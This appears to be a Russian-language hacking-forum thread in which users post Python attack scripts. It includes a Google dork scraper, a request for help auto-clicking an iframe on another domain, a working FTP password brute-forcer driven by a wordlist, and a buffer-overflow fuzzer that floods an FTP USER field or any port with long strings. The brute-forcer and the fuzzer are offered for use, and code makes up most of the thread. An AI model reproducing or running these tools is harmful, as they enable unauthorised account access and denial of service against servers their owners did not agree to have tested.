Code: from bs4 import BeautifulSoup import requests dork = 'vk' #поисковой запрос li = 20 #number page 10,20,30,...etc def googlesearch(searchfor): for lis in range(li): if (lis%10): link = 'https://www.google.com/search?q=%s&ie=utf-8&oe=utf-8&start=%d' % (searchfor, lis) ua = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0'} payload = {'q': searchfor} response = requests.get(link, headers=ua, params=payload) soup = BeautifulSoup(response.text, 'html.parser') par = soup.find_all('h3', class_="r") for a in par: print(a.find('a').get('href')) googlesearch(dork) немного не то конечно, по сути парсинг урлов из гугловой выдачи, но может кому пригодится.
люди добрые! подскажите пожалуйста - как сделать автоклик по айфрему не на своем домене. я уже выбился из сил =(
Вчера написал брутер фтп на питоне, может кому интересно будет код глянуть: Code: import socket import sys import time user = input("user to brute:") ip = input("ip of ftp serv:") port = int(input("port(21 - standartly):")) spath = input("full path to slovar:") def login(u,p,h,prt): s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect_ex((h,prt)) time.sleep(0.01) r = s.recv(1024) s.send(("USER "+u+"\n\r").encode()) time.sleep(0.01) r = s.recv(1024) s.send(("PASS "+p+"\r\n").encode()) time.sleep(0.01) r = s.recv(1024).decode() r = r.split(" ") s.send("QUIT\r\n".encode()) return int(r[0])#код ответа def get_pass(path): a = open(path,"r") r = a.read() r = r.split(" ") a.close() return r def brute(path,user,ip,port): pasws = get_pass(path) for i in pasws: if(login(user,i,ip,port)==230): sys.exit(user + " : " + i + " <-bruted!") print("starting...") brute(spath,user,ip,port) sleep'ы нужны, без них сервер не успевает ловить и обрабатывать отправленные ему пакеты. Делал не используя ftp библиотек, чтоб понять протокол, да и полезнее так писать(ИМХО). Есть у кого пример работы с socks4/5 проксями?
Code: import socket import sys import time ip = input("ip:") port = int(input("port:")) buf = 'x41'*500#50 'A' while 1: s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) if(s.connect_ex((ip,port))==-1): sys.exit("can't connect. \nMay be host have buffer owerflow vulneriable!\nLast buf len:"+len(buf)) r = s.recv(1024) time.sleep(6) print("sending buf with len:"+str(len(buf))) if(port == 21): u = b"USER "+buf.encode()+b"\r\n" else: u = buf.encode() s.send(u) s.close() buf = buf + 'x41'*500 простой фаззер проверки переполнения буфера на питоне.